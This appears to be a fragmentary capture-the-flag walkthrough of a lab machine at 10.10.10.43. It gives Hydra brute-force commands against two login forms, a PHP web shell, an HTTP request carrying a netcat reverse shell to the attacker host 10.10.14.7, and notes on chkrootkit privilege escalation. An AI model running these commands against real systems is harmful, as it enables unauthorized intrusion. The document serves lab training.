Only http/https ports are opened
After some time it found also directory: /secure_notes
/department directory redirects user to login page
Hydra login pages brute force syntax:
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password" 
So I am authenticated so I can try to leverage my previous findings:
https://www.exploit-db.com/exploits/24044
First:
Create new database:
Create new table:
I went back to my other hydra brute force
I created again table and added the same payload in the Field and Default Value
<?php system($_GET["cmd"]); ?>
URL encode this reverse shell payload
GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.7+2222+>/tmp/f HTTP/1.1
Host: 10.10.10.43
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=be3n40q3kq5mi26sdhu02580p3
Upgrade-Insecure-Requests: 1
I have run a linpeas
I took the text from this output and googled it. It is a chrootkit
From gobuster which was scanning https main dir I found another location:
I couldn’t use ssh key to login from my own box, because ssh port is listening only locally. I may try to forward this port, but probably there are some firewall rules which blocks port 22 from being opened to the outside.
I have run linpeas on amrois user
I will check this vulnerability in 2 ways:
- adding sticky bit to bash as a root
- sending reverse shell to my host
Both ways worked, so to be honest I didn’t need to get to user, I could escalate my privileges from www-data user to root, without getting user access.